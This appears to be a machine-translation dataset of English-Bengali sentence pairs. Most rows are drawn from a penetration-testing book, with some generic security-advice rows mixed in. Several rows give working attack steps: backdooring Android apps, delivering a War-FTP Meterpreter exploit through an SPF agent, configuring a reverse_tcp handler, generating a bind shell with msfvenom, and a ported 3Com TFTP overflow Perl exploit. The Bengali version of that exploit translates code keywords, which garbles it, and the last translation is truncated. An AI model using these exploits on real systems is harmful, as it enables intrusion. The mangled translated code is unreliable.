en
stringlengths 4
3.31k
| translation
stringlengths 5
3.49k
| target_lang
stringclasses 10
values | domain
stringclasses 6
values | complexity
stringclasses 3
values |
|---|---|---|---|---|
Various USSD tags offer all sorts of functionality.
|
বিভিন্ন ইউএসএসডি ট্যাগ বিভিন্ন ধরণের কার্যকারিতা প্রদান করে।
|
bn
|
technical
|
moderate
|
Our example will use a more innocuous payload than the one described previously.
|
আমাদের উদাহরণটি পূর্বে বর্ণিতটির চেয়ে নিরীহ পেলোড ব্যবহার করবে।
|
bn
|
technical
|
moderate
|
We’ll have our device automatically dial a code to present its unique identifier in a pop-up.
|
আমরা আমাদের ডিভাইসটিকে স্বয়ংক্রিয়ভাবে একটি কোড ডায়াল করতে বলব যা একটি পপ-আপে তার অনন্য শনাক্তকারী উপস্থাপন করবে।
|
bn
|
technical
|
complex
|
To run the safe USSD example in SPF, choose menu option 6, then 3.) USSD Webpage Attack (Safe) u.
|
এসপিএফ-এ নিরাপদ ইউএসএসডি উদাহরণটি চালানোর জন্য, মেনু বিকল্প ৬ নির্বাচন করুন, তারপর ৩.) ইউএসএসডি ওয়েবপেজ অ্যাটাক (নিরাপদ) u নির্বাচন করুন।
|
bn
|
technical
|
moderate
|
You’ll be asked for the location of the web server, the name of the malicious page, and the phone number to text it to.
|
আপনাকে ওয়েব সার্ভারের অবস্থান, দূষিত পৃষ্ঠার নাম এবং যে ফোন নম্বরে এটি পাঠাতে হবে তা জিজ্ঞাসা করা হবে।
|
bn
|
technical
|
moderate
|
This time, instead of crashing the browser, the dialer app opens, and a pop-up notification appears.
|
এইবার, ব্রাউজার ক্র্যাশ করার পরিবর্তে, ডায়লার অ্যাপটি খোলে এবং একটি পপ-আপ বিজ্ঞপ্তি প্রদর্শিত হয়।
|
bn
|
technical
|
moderate
|
Though this example was not harmful to the device or its data, other USSD codes can be if they are opened in the dialer.
|
যদিও এই উদাহরণটি ডিভাইস বা এর ডেটার জন্য ক্ষতিকারক ছিল না, তবে অন্যান্য ইউএসএসডি কোডগুলি ডায়লারে খুললে ক্ষতিকারক হতে পারে।
|
bn
|
technical
|
complex
|
Android has a complicated relationship with security updates.
|
অ্যান্ড্রয়েডের নিরাপত্তা আপডেটের সাথে একটি জটিল সম্পর্ক রয়েছে।
|
bn
|
technical
|
moderate
|
The problem is that anyone can make an Android device with its own implementation of the Android OS.
|
সমস্যা হল যে যে কেউ অ্যান্ড্রয়েড ওএস-এর নিজস্ব বাস্তবায়ন সহ একটি অ্যান্ড্রয়েড ডিভাইস তৈরি করতে পারে।
|
bn
|
technical
|
complex
|
When Google releases a new version with a set of patches, every original equipment manufacturer (OEM) needs to port the changes to its version of Android.
|
যখন গুগল প্যাচগুলির একটি সেট সহ একটি নতুন সংস্করণ প্রকাশ করে, তখন প্রতিটি মূল সরঞ্জাম প্রস্তুতকারকের (OEM) অ্যান্ড্রয়েডের তার সংস্করণে পরিবর্তনগুলি পোর্ট করতে হয়।
|
bn
|
technical
|
complex
|
However, updates are not delivered consistently, which means that millions of unpatched devices may be in use.
|
তবে, আপডেটগুলি ধারাবাহিকভাবে সরবরাহ করা হয় না, যার অর্থ হল লক্ষ লক্ষ অপরিবর্তিত ডিভাইস ব্যবহার করা হতে পারে।
|
bn
|
technical
|
moderate
|
Now let’s turn our attention to a vulnerability that will probably never be patched: malicious applications.
|
আসুন এখন এমন একটি দুর্বলতার দিকে মনোযোগ দিই যা সম্ভবত কখনই প্যাচ করা হবে না: দূষিত অ্যাপ্লিকেশন।
|
bn
|
technical
|
moderate
|
We’ve studied malicious programs intermittently throughout this book.
|
আমরা এই বইটিতে মাঝে মাঝে দূষিত প্রোগ্রামগুলি নিয়ে গবেষণা করেছি।
|
bn
|
technical
|
moderate
|
Mobile users are inundated with reasons to download apps to their devices, and mobile malware is on the rise.
|
মোবাইল ব্যবহারকারীরা তাদের ডিভাইসে অ্যাপ ডাউনলোড করার জন্য বিভিন্ন কারণে জর্জরিত, এবং মোবাইল ম্যালওয়্যার বাড়ছে।
|
bn
|
technical
|
moderate
|
If a user can be tricked into installing a malicious app, the attacker can utilize Android’s APIs to steal data, gain remote control, and even attack other devices.
|
যদি কোনও ব্যবহারকারীকে একটি দূষিত অ্যাপ ইনস্টল করতে প্ররোচিত করা যায়, তবে আক্রমণকারী ডেটা চুরি করতে, রিমোট কন্ট্রোল পেতে এবং এমনকি অন্যান্য ডিভাইসগুলিতে আক্রমণ করতে অ্যান্ড্রয়েডের এপিআই ব্যবহার করতে পারে।
|
bn
|
technical
|
complex
|
In the Android security model, apps must request permissions to use APIs that could be used maliciously, and users must accept the requested permissions at installation.
|
অ্যান্ড্রয়েড সুরক্ষা মডেলটিতে, অ্যাপ্লিকেশনগুলিকে এমন এপিআই ব্যবহার করার জন্য অনুমতি চাইতে হবে যা দূষিতভাবে ব্যবহার করা যেতে পারে এবং ব্যবহারকারীদের ইনস্টলেশনের সময় অনুরোধ করা অনুমতিগুলি গ্রহণ করতে হবে।
|
bn
|
technical
|
complex
|
We can use Android permissions to control the device without running an additional exploit after the user installs the malicious app.
|
ব্যবহারকারী দূষিত অ্যাপটি ইনস্টল করার পরে অতিরিক্ত কোনও শোষণ না করেই আমরা অ্যান্ড্রয়েড অনুমতি ব্যবহার করে ডিভাইসটি নিয়ন্ত্রণ করতে পারি।
|
bn
|
technical
|
complex
|
SPF allows us to create a malicious app with a variety of interesting functionality.
|
এসপিএফ আমাদের বিভিন্ন আকর্ষণীয় কার্যকারিতা সহ একটি দূষিত অ্যাপ তৈরি করতে দেয়।
|
bn
|
technical
|
moderate
|
Earlier we used the SPF app on our pentester-controlled device to allow SPF to use the device’s mobile modem and other functionality.
|
আগে আমরা আমাদের পেন্টেস্টিং-নিয়ন্ত্রিত ডিভাইসে এসপিএফ অ্যাপটি ব্যবহার করেছি যাতে এসপিএফ ডিভাইসের মোবাইল মডেম এবং অন্যান্য কার্যকারিতা ব্যবহার করতে পারে।
|
bn
|
technical
|
complex
|
We can embed the agent inside any legitimate app: SPF can take a compiled APK file and backdoor it with the agent, or if we have the source code of the app, we can backdoor that as well.
|
আমরা যেকোনো বৈধ অ্যাপের ভিতরে এজেন্ট এম্বেড করতে পারি: এসপিএফ একটি সংকলিত APK ফাইল নিতে পারে এবং এজেন্ট দিয়ে ব্যাকডোর করতে পারে, অথবা যদি আমাদের অ্যাপের সোর্স কোড থাকে, তবে আমরা সেটিও ব্যাকডোর করতে পারি।
|
bn
|
technical
|
complex
|
The company's network was vulnerable to several attacks.
|
কোম্পানির নেটওয়ার্ক বেশ কয়েকটি আক্রমণের জন্য ঝুঁকিপূর্ণ ছিল।
|
bn
|
technical
|
moderate
|
Install the necessary security patches to protect your system.
|
আপনার সিস্টেমকে সুরক্ষিত রাখতে প্রয়োজনীয় নিরাপত্তা প্যাচগুলি ইনস্টল করুন।
|
bn
|
technical
|
simple
|
Penetration testing helps identify weaknesses in a system.
|
অনুপ্রবেশ পরীক্ষা একটি সিস্টেমে দুর্বলতা সনাক্ত করতে সহায়তা করে।
|
bn
|
technical
|
simple
|
A strong password is the first line of defense against unauthorized access.
|
একটি শক্তিশালী পাসওয়ার্ড অননুমোদিত অ্যাক্সেসের বিরুদ্ধে প্রথম সুরক্ষা স্তর।
|
bn
|
technical
|
simple
|
The hacker exploited a vulnerability in the web server.
|
হ্যাকার ওয়েব সার্ভারে একটি দুর্বলতার সুযোগ নিয়েছিল।
|
bn
|
technical
|
moderate
|
Regularly update your software to mitigate security risks.
|
নিরাপত্তা ঝুঁকি কমাতে নিয়মিত আপনার সফ্টওয়্যার আপডেট করুন।
|
bn
|
technical
|
simple
|
Social engineering is a common tactic used by attackers.
|
সামাজিক প্রকৌশল আক্রমণকারীদের দ্বারা ব্যবহৃত একটি সাধারণ কৌশল।
|
bn
|
technical
|
moderate
|
The firewall blocked the malicious traffic.
|
ফায়ারওয়াল দূষিত ট্র্যাফিককে ব্লক করেছে।
|
bn
|
technical
|
simple
|
Data encryption protects sensitive information from being compromised.
|
ডেটা এনক্রিপশন সংবেদনশীল তথ্যকে আপোস হওয়া থেকে রক্ষা করে।
|
bn
|
technical
|
moderate
|
The security audit revealed several critical flaws.
|
নিরাপত্তা নিরীক্ষণে বেশ কয়েকটি গুরুতর ত্রুটি ধরা পড়েছে।
|
bn
|
technical
|
moderate
|
Network segmentation can limit the impact of a security breach.
|
নেটওয়ার্ক বিভাজন নিরাপত্তা লঙ্ঘনের প্রভাব সীমিত করতে পারে।
|
bn
|
technical
|
moderate
|
The attacker used a phishing email to steal credentials.
|
আক্রমণকারী শংসাপত্রগুলি চুরি করতে একটি ফিশিং ইমেল ব্যবহার করেছে।
|
bn
|
technical
|
moderate
|
Implement multi-factor authentication for enhanced security.
|
উন্নত নিরাপত্তার জন্য মাল্টি-ফ্যাক্টর প্রমাণীকরণ প্রয়োগ করুন।
|
bn
|
technical
|
moderate
|
The incident response team investigated the security breach.
|
ঘটনা প্রতিক্রিয়া দল নিরাপত্তা লঙ্ঘনের তদন্ত করেছে।
|
bn
|
technical
|
moderate
|
Regular backups are essential for data recovery.
|
ডেটা পুনরুদ্ধারের জন্য নিয়মিত ব্যাকআপ অপরিহার্য।
|
bn
|
technical
|
simple
|
The company's security policy needs to be updated.
|
কোম্পানির নিরাপত্তা নীতি আপডেট করা দরকার।
|
bn
|
technical
|
simple
|
Security awareness training is crucial for all employees.
|
নিরাপত্তা সচেতনতা প্রশিক্ষণ সকল কর্মচারীর জন্য গুরুত্বপূর্ণ।
|
bn
|
technical
|
moderate
|
The vulnerability assessment identified several weaknesses.
|
দুর্বলতা মূল্যায়ন বেশ কয়েকটি দুর্বলতা চিহ্নিত করেছে।
|
bn
|
technical
|
moderate
|
The system was compromised due to a zero-day exploit.
|
একটি শূন্য-দিনের শোষণের কারণে সিস্টেমটি আপোস করা হয়েছিল।
|
bn
|
technical
|
complex
|
Protect your digital assets from cyber threats.
|
সাইবার হুমকি থেকে আপনার ডিজিটাল সম্পদ রক্ষা করুন।
|
bn
|
technical
|
simple
|
We can do the same thing for Android as long as we have an ARM cross compiler.
|
আমাদের অ্যান্ড্রয়েডের জন্য একই কাজ করতে পারি যদি আমাদের একটি ARM ক্রস কম্পাইলার থাকে।
|
bn
|
technical
|
moderate
|
Luckily, SPF has one. As shown in Listing 20-23, choose option 9.) Compile code to run on mobile devices from the main menu.
|
সৌভাগ্যবশত, SPF এর একটি আছে। তালিকা 20-23 এ দেখানো হয়েছে, প্রধান মেনু থেকে মোবাইল ডিভাইসে চালানোর জন্য কোড কম্পাইল করতে 9 নম্বর বিকল্পটি বেছে নিন।
|
bn
|
technical
|
moderate
|
Compile code to run on mobile devices 1.) Compile C code for ARM Android spf> 1u Compiles C code to run on ARM based Android devices.
|
মোবাইল ডিভাইসে চালানোর জন্য কোড কম্পাইল করুন 1.) ARM Android এর জন্য C কোড কম্পাইল করুন spf> 1u ARM ভিত্তিক Android ডিভাইসে চালানোর জন্য C কোড কম্পাইল করে।
|
bn
|
technical
|
moderate
|
Supply the C code file and the output filename File to Compile: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv Output File: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
|
C কোড ফাইল এবং আউটপুট ফাইলের নাম সরবরাহ করুন ফাইল কম্পাইল করতে: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv আউটপুট ফাইল: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
|
bn
|
technical
|
complex
|
Select 1.) Compile C code for ARM Android u. You will be prompted for the C file to compile as well as where you want to put the compiled binary v.
|
1 নির্বাচন করুন।) ARM Android এর জন্য C কোড কম্পাইল করুন u। আপনাকে C ফাইলটি কম্পাইল করতে এবং সংকলিত বাইনারি v কোথায় রাখতে চান তার জন্য অনুরোধ করা হবে।
|
bn
|
technical
|
moderate
|
Now we need to download the War-FTP exploit to our infected Android device.
|
এখন আমাদের সংক্রমিত অ্যান্ড্রয়েড ডিভাইসে War-FTP এক্সপ্লয়েট ডাউনলোড করতে হবে।
|
bn
|
technical
|
moderate
|
From the agent commands menu, choose option 6 to download a file.
|
এজেন্ট কমান্ড মেনু থেকে, একটি ফাইল ডাউনলোড করতে 6 নম্বর বিকল্পটি বেছে নিন।
|
bn
|
technical
|
simple
|
You will be asked for the file to download and the delivery method, as shown in Listing 20-24.
|
আপনাকে ডাউনলোড করার জন্য ফাইল এবং ডেলিভারি পদ্ধতি জিজ্ঞাসা করা হবে, যেমন তালিকা 20-24 এ দেখানো হয়েছে।
|
bn
|
technical
|
moderate
|
Select a command to perform or 0 to return to the previous menu spf> 6 Downloads a file to the phone.
|
সম্পাদন করার জন্য একটি কমান্ড নির্বাচন করুন বা আগের মেনুতে ফিরে যেতে 0 নির্বাচন করুন spf> 6 ফোনে একটি ফাইল ডাউনলোড করে।
|
bn
|
technical
|
moderate
|
Fill in the file and the delivery method(SMS or HTTP). File to download: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter Delivery Method(SMS or HTTP): HTTP
|
ফাইল এবং ডেলিভারি পদ্ধতি পূরণ করুন (এসএমএস বা এইচটিটিপি)। ডাউনলোড করার জন্য ফাইল: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter ডেলিভারি পদ্ধতি (এসএমএস বা এইচটিটিপি): এইচটিটিপি
|
bn
|
technical
|
complex
|
Before we run the exploit, we need to set up a handler in Msfconsole, as shown in Listing 20-25.
|
এক্সপ্লয়েট চালানোর আগে, আমাদের Msfconsole-এ একটি হ্যান্ডলার সেট আপ করতে হবে, যেমন তালিকা 20-25 এ দেখানো হয়েছে।
|
bn
|
technical
|
moderate
|
Open Msfconsole on Kali, and use the multi/handler module, setting the options to match the payload in the War-FTP exploit.
|
কালিতে Msfconsole খুলুন এবং multi/handler মডিউলটি ব্যবহার করুন, War-FTP এক্সপ্লয়েটে পেলোডের সাথে মেলে এমন বিকল্পগুলি সেট করুন।
|
bn
|
technical
|
moderate
|
msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
|
msf > multi/handler ব্যবহার করুন msf exploit(handler) > পেলোড windows/meterpreter/reverse_tcp পেলোড সেট করুন => windows/meterpreter/reverse_tcp
|
bn
|
technical
|
complex
|
msf exploit(handler) > set LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.20.9:4444 [*] Starting the payload handler...
|
msf exploit(handler) > LHOST 192.168.20.9 LHOST সেট করুন => 192.168.20.9 msf exploit(handler) > exploit [*] 192.168.20.9:4444 [*] এ বিপরীত হ্যান্ডলার শুরু হয়েছে পেলোড হ্যান্ডলার শুরু হচ্ছে...
|
bn
|
technical
|
complex
|
Finally, it’s time to run the exploit. As shown in Listing 20-26, choose option 7.) Execute Command from the agent commands menu; you will be prompted for the command to run.
|
অবশেষে, এক্সপ্লয়েট চালানোর সময় এসেছে। তালিকা 20-26 এ দেখানো হয়েছে, এজেন্ট কমান্ড মেনু থেকে 7 নম্বর বিকল্পটি বেছে নিন।) কমান্ডটি কার্যকর করুন; আপনাকে চালানোর জন্য কমান্ডের জন্য অনুরোধ করা হবে।
|
bn
|
technical
|
moderate
|
Select a command to perform or 0 to return to the previous menu spf> 7 Run a command in the terminal.
|
সম্পাদন করার জন্য একটি কমান্ড নির্বাচন করুন বা আগের মেনুতে ফিরে যেতে 0 নির্বাচন করুন spf> 7 টার্মিনালে একটি কমান্ড চালান।
|
bn
|
technical
|
moderate
|
Fill in the command and the delivery method(SMS or HTTP). Command: warftpmeterpreter 192.168.20.10 21u Downloaded?: yesv Delivery Method(SMS or HTTP): HTTP
|
কমান্ড এবং ডেলিভারি পদ্ধতি পূরণ করুন (এসএমএস বা এইচটিটিপি)। কমান্ড: warftpmeterpreter 192.168.20.10 21u ডাউনলোড করা হয়েছে?: হ্যাঁv ডেলিভারি পদ্ধতি (এসএমএস বা এইচটিটিপি): এইচটিটিপি
|
bn
|
technical
|
complex
|
Tell SPF the full command, including arguments u. In this case, we need to tell the exploit the IP address and port to attack.
|
SPF-কে সম্পূর্ণ কমান্ডটি বলুন, যুক্তি সহ u। এই ক্ষেত্রে, আমাদের এক্সপ্লয়েটকে আক্রমণ করার জন্য আইপি ঠিকানা এবং পোর্ট বলতে হবে।
|
bn
|
technical
|
moderate
|
SPF asks if the binary was downloaded. If it was downloaded through SPF, it will be in the agent’s files directory, and SPF will need to know to run it from there.
|
SPF জিজ্ঞাসা করে বাইনারি ডাউনলোড করা হয়েছে কিনা। যদি এটি SPF এর মাধ্যমে ডাউনলোড করা হয়, তবে এটি এজেন্টের ফাইল ডিরেক্টরিতে থাকবে এবং SPF-কে সেখান থেকে এটি চালানোর জন্য জানতে হবে।
|
bn
|
technical
|
moderate
|
In our case, we answer yes v, then enter the delivery method as usual. Watch your Metasploit listener. In about a minute you should receive a Meterpreter prompt like the one shown next.
|
আমাদের ক্ষেত্রে, আমরা হ্যাঁ v উত্তর দিই, তারপর যথারীতি ডেলিভারি পদ্ধতি লিখি। আপনার Metasploit শ্রোতাকে দেখুন। প্রায় এক মিনিটের মধ্যে আপনি একটি Meterpreter প্রম্পট পাবেন যেমনটি পরবর্তীতে দেখানো হয়েছে।
|
bn
|
technical
|
moderate
|
Windows XP does not use ASLR, discussed later in this chapter, so USER32.dll is loaded into the same memory location on all Windows XP SP3 English platforms.
|
উইন্ডোজ এক্সপি এএসএলআর ব্যবহার করে না, যা এই অধ্যায়ে পরে আলোচনা করা হয়েছে, তাই USER32.dll সমস্ত উইন্ডোজ এক্সপি এসপি3 ইংরেজি প্ল্যাটফর্মে একই মেমরি লোকেশনে লোড হয়।
|
bn
|
technical
|
moderate
|
We have taken advantage of static DLL locations in our previous exploit exercises.
|
আমরা আমাদের আগের এক্সপ্লয়েট অনুশীলনে স্ট্যাটিক ডিএলএল লোকেশনগুলির সুবিধা নিয়েছি।
|
bn
|
technical
|
moderate
|
We need not have a copy of 3Com TFTP running to find the memory locations of instructions in Windows components.
|
উইন্ডোজ উপাদানগুলিতে নির্দেশাবলীর মেমরি অবস্থানগুলি খুঁজে বের করার জন্য আমাদের 3Com TFTP-এর একটি অনুলিপি চালানোর প্রয়োজন নেই।
|
bn
|
technical
|
moderate
|
For example, as shown in Figure 19-4, from debugging War-FTP, we can search for a JMP ESI instruction in USER32.dll.
|
উদাহরণস্বরূপ, চিত্র 19-4-এ দেখানো হয়েছে, War-FTP ডিবাগিং থেকে, আমরা USER32.dll-এ একটি JMP ESI নির্দেশনার জন্য অনুসন্ধান করতে পারি।
|
bn
|
technical
|
moderate
|
(It is a good idea to stick with the DLL noted in the original exploit if we don’t have a copy of the program.
|
(যদি আমাদের প্রোগ্রামের অনুলিপি না থাকে তবে মূল এক্সপ্লয়েটে উল্লিখিত ডিএলএল-এর সাথে লেগে থাকা একটি ভাল ধারণা।
|
bn
|
technical
|
moderate
|
We can’t be sure the program loads MSVCRT.dll, for example.)
|
উদাহরণস্বরূপ, আমরা নিশ্চিত হতে পারি না যে প্রোগ্রামটি MSVCRT.dll লোড করে।)
|
bn
|
technical
|
moderate
|
Of course, in our case, we have 3Com TFTP locally, but if we didn’t have access to the app, we could use Mona to look for JMP instructions inside a specific module.
|
অবশ্যই, আমাদের ক্ষেত্রে, আমাদের কাছে স্থানীয়ভাবে 3Com TFTP আছে, কিন্তু যদি আমাদের অ্যাপটিতে অ্যাক্সেস না থাকত, তাহলে আমরা একটি নির্দিষ্ট মডিউলের ভিতরে JMP নির্দেশনার জন্য Mona ব্যবহার করতে পারতাম।
|
bn
|
technical
|
complex
|
For example, we could look for instances of JMP ESI (or the equivalent) with the command !mona jmp -r esi -m user32, as shown in Figure 19-4.
|
উদাহরণস্বরূপ, আমরা চিত্র 19-4-এ দেখানো হয়েছে, !mona jmp -r esi -m user32 কমান্ডের মাধ্যমে JMP ESI (বা সমতুল্য) এর উদাহরণগুলি সন্ধান করতে পারতাম।
|
bn
|
technical
|
complex
|
And we find a JMP ESI instruction at the memory address 7E45AE4E in USER32.dll on Windows XP SP3.
|
এবং আমরা উইন্ডোজ এক্সপি এসপি3-এ USER32.dll-এ 7E45AE4E মেমরি ঠিকানায় একটি JMP ESI নির্দেশনা খুঁজে পাই।
|
bn
|
technical
|
moderate
|
If we change the jmp_2000 variable to this value in little-endian format, this exploit should work for our platform.
|
যদি আমরা ছোট-এন্ডিয়ান ফর্ম্যাটে jmp_2000 ভেরিয়েবলটিকে এই মানটিতে পরিবর্তন করি, তাহলে এই এক্সপ্লয়েটটি আমাদের প্ল্যাটফর্মের জন্য কাজ করা উচিত।
|
bn
|
technical
|
moderate
|
$jmp_2000 = "\x4E\xAE\x45\x7E";
|
$jmp_2000 = "\x4E\xAE\x45\x7E";
|
bn
|
technical
|
simple
|
Replacing Shellcode As noted earlier, we also need to replace the shellcode with code generated by Msfvenom.
|
শেলকোড প্রতিস্থাপন পূর্বে যেমন উল্লেখ করা হয়েছে, আমাদের Msfvenom দ্বারা তৈরি কোড দিয়ে শেলকোড প্রতিস্থাপন করতে হবে।
|
bn
|
technical
|
moderate
|
We can use a bind shell or any Windows payload that will fit in 344 + 129 bytes (the included shellcode plus the NOP sled).
|
আমরা একটি বাইন্ড শেল বা যেকোনো উইন্ডোজ পেলোড ব্যবহার করতে পারি যা 344 + 129 বাইটের মধ্যে ফিট হবে (অন্তর্ভুক্ত শেলকোড এবং NOP sled)।
|
bn
|
technical
|
moderate
|
The only bad character we need to avoid this time is the null byte.
|
এই সময়ে আমাদের এড়াতে হবে এমন একমাত্র খারাপ অক্ষর হল শূন্য বাইট।
|
bn
|
technical
|
simple
|
Tell Msfvenom to out- put the payload in Perl format so we can easily add it to our exploit.
|
Msfvenom-কে পার্ল ফর্ম্যাটে পেলোড আউটপুট করতে বলুন যাতে আমরা সহজেই এটিকে আমাদের এক্সপ্লয়েটে যোগ করতে পারি।
|
bn
|
technical
|
moderate
|
root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00' -s 473 -f perl
|
root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00' -s 473 -f perl
|
bn
|
technical
|
simple
|
Editing the Exploit Our generated shellcode from Msfvenom is 368 bytes, whereas the original shellcode in the public exploit was 344 bytes.
|
এক্সপ্লয়েট সম্পাদনা Msfvenom থেকে আমাদের তৈরি করা শেলকোড 368 বাইট, যেখানে পাবলিক এক্সপ্লয়েটের মূল শেলকোড ছিল 344 বাইট।
|
bn
|
technical
|
moderate
|
Now make the changes to the original exploit code shown in Listing 19-6.
|
এখন তালিকা 19-6-এ দেখানো মূল এক্সপ্লয়েট কোডে পরিবর্তন করুন।
|
bn
|
technical
|
simple
|
We delete the NOP sled and pad our exploit string with 105 bytes after the shellcode, so our return address still ends up hijacking EIP.
|
আমরা NOP sled মুছে ফেলি এবং শেলকোডের পরে 105 বাইট দিয়ে আমাদের এক্সপ্লয়েট স্ট্রিং প্যাড করি, যাতে আমাদের রিটার্ন ঠিকানা এখনও EIP হাইজ্যাক করে।
|
bn
|
technical
|
complex
|
Fuzzing, Porting Exploits, and Metasploit Modules 431 #!/usr/bin/perl -w #=============================================================== # 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit # By Umesh Wanve (umesh_345@yahoo.com) #=============================================================== # Credits : Liu Qixu is credited with the discovery of this vulnerability. # Reference : http://www.securityfocus.com/bid/21301 # Date : 27-02-2007 # Tested on Windows XP SP3 # You can replace shellcode with your favourite one : # Buffer overflow exists in transporting mode name of TFTP server. # So here you go. # Buffer = "\x00\x02" + "filename" + "\x00" + nop sled + Shellcode + JUMP + "\x00"; # This was written for educational purpose. Use it at your own risk. Author will not be responsible for any damage. #=============================================================== use IO::Socket; if(!($ARGV[1])) { print "\n3COM Tftp long transport name exploit\n"; print "\tCoded by Umesh wanve\n\n"; print "Use: 3com_tftp.pl <host> <port>\n\n"; exit; } $target = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) or die "Cannot connect to $ARGV[0] on port $ARGV[1]"; my($shellcode) = u "\xda\xc5\xd9\x74\x24\xf4\x5f\xb8\xd4\x9d\x5d\x7a\x29\xc9" . --snip-- "\x27\x92\x07\x7e"; print "++ Building Malicious Packet .....\n"; $padding="A" x 105; v $jmp_xp = "\x4E\xAE\x45\x7E"; w# jmp esi user32.dll windows xp sp3 english $exploit = "\x00\x02"; #write request (header) $exploit=$exploit."A"; #file name $exploit=$exploit."\x00"; #Start of transporting name $exploit=$exploit.$shellcode; #shellcode $exploit=$exploit.$padding; #padding $exploit=$exploit.$jmp_xp; #jump to shellcode $exploit=$exploit."\x00"; #end of TS mode name print $target $exploit; #Attack on victim print "++ Exploit packet sent ...\n"; print "++ Done.\n"; print "++ Telnet to 4444 on victim's machine ....\n"; sleep(2); close($target); exit; #---------------------------------------------------------------------------------------------- # milw0rm.com [2007-02-28] Listing 19-6: The ported exploit 432 Chapter 19 Our ported exploit will look like Listing 19-6, with the shellcode u, padding v, and return address w adjusted to meet our needs. If you’ve done everything correctly, when you run the ported exploit, a bind shell with System privileges will open on TCP port 4444, as shown in Listing 19-7. root@kali:~# ./exploitdbexploit.pl 192.168.20.10 69 ++ Building Malicious Packet ..... ++ Exploit packet sent ... ++ Done. ++ Telnet to 4444 on victim's machine .... root@kali:~# nc 192.168.20.10 4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> Listing 19-7: Running the ported exploit writing metasploit modules Throughout this book we have leveraged many Metasploit modules for information gathering, exploitation, post exploitation, and so on. As new vulnerabilities are discovered, Metasploit modules are written for these issues, often by members of the security community like you. Additionally, as new post-exploitation or information-gathering techniques are imple- mented by researchers, they are often ported into Metasploit modules. In this section, we will look at the basics of writing our own Metasploit exploit module.
|
ফ্যাজিং, এক্সপ্লয়েটগুলি পোর্টিং এবং মেটাসপ্লয়েট মডিউল 431 #!/usr/bin/perl -w #=============================================================== # 3Com TFTP পরিষেবা <= 2.0.1 (দীর্ঘ পরিবহন মোড) ওভারফ্লো পার্ল এক্সপ্লয়েট # উমেশ ওয়ানভে (umesh_345@yahoo.com) দ্বারা #=============================================================== # ক্রেডিট: এই দুর্বলতা আবিষ্কারের জন্য লিউ কিক্সুকে কৃতিত্ব দেওয়া হয়। # রেফারেন্স: http://www.securityfocus.com/bid/21301 # তারিখ: 27-02-2007 # উইন্ডোজ এক্সপি এসপি3-এ পরীক্ষিত # আপনি আপনার পছন্দের একটির সাথে শেলকোড প্রতিস্থাপন করতে পারেন: # বাফার ওভারফ্লো টিএফটিপি সার্ভারের পরিবহন মোড নামে বিদ্যমান। # তাই এখানে যান। # বাফার = "\x00\x02" + "ফাইলের নাম" + "\x00" + নপ স্লেড + শেলকোড + জাম্প + "\x00"; # এটি শিক্ষাগত উদ্দেশ্যে লেখা হয়েছে। আপনার নিজের ঝুঁকিতে এটি ব্যবহার করুন। লেখক কোনো ক্ষতির জন্য দায়ী থাকবেন না। #=============================================================== ব্যবহার করুন IO::Socket; যদি(!($ARGV[1])) { প্রিন্ট "\n3COM Tftp দীর্ঘ পরিবহন নাম এক্সপ্লয়েট\n"; প্রিন্ট "\tউমেশ ওয়ানভে দ্বারা কোড করা হয়েছে\n\n"; প্রিন্ট "ব্যবহার করুন: 3com_tftp.pl <হোস্ট> <পোর্ট>\n\n"; প্রস্থান করুন; } $লক্ষ্য = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) অথবা die "পোর্ট $ARGV[1]-এ $ARGV[0]-এর সাথে সংযোগ করতে পারছি না"; my($shellcode) = u "\xda\xc5\xd9\x74\x24\xf4\x5f\xb8\xd4\x9d\x5d\x7a\x29\xc9" . --snip-- "\x27\x92\x07\x7e"; প্রিন্ট "++ দূষিত প্যাকেট তৈরি করা হচ্ছে .....\n"; $প্যাডিং="A" x 105; v $jmp_xp = "\x4E\xAE\x45\x7E"; w# jmp esi user32.dll উইন্ডোজ এক্সপি sp3 ইংরেজি $এক্সপ্লয়েট = "\x00\x02"; #রাইট রিকোয়েস্ট (হেডার) $এক্সপ্লয়েট=$এক্সপ্লয়েট."A"; #ফাইলের নাম $এক্সপ্লয়েট=$এক্সপ্লয়েট."\x00"; #পরিবহন নামের শুরু $এক্সপ্লয়েট=$এক্সপ্লয়েট.$শেলকোড; #শেলকোড $এক্সপ্লয়েট=$এক্সপ্লয়েট.$প্যাডিং; #প্যাডিং $এক্সপ্লয়েট=$এক্সপ্লয়েট.$jmp_xp; #শেলকোডে জাম্প করুন $এক্সপ্লয়েট=$এক্সপ্লয়েট."\x00"; #টিএস মোড নামের শেষ প্রিন্ট $লক্ষ্য $এক্সপ্লয়েট; #ভিকটিমের উপর আক্রমণ প্রিন্ট "++ এক্সপ্লয়েট প্যাকেট পাঠানো হয়েছে ...\n"; প্রিন্ট "++ সম্পন্ন।\n"; প্রিন্ট "++ ভিকটিমের মেশিনে 4444-এ টেলনেট করুন ....\n"; ঘুম(2); বন্ধ($লক্ষ্য); প্রস্থান করুন; #---------------------------------------------------------------------------------------------- # milw0rm.com [2007-02-28] তালিকা 19-6: পোর্টেড এক্সপ্লয়েট 432 অধ্যায় 19 আমাদের পোর্টেড এক্সপ্লয়েট তালিকা 19-6-এর মতো দেখাবে, শেলকোড u, প্যাডিং v, এবং রিটার্ন ঠিকানা w আমাদের চাহিদা মেটাতে সমন্বয় করা হয়েছে। আপনি যদি সবকিছু সঠিকভাবে করে থাকেন, তাহলে আপনি যখন পোর্টেড এক্সপ্লয়েট চালাবেন, তখন সিস্টেমের বিশেষাধিকার সহ একটি বাইন্ড শেল TCP পোর্ট 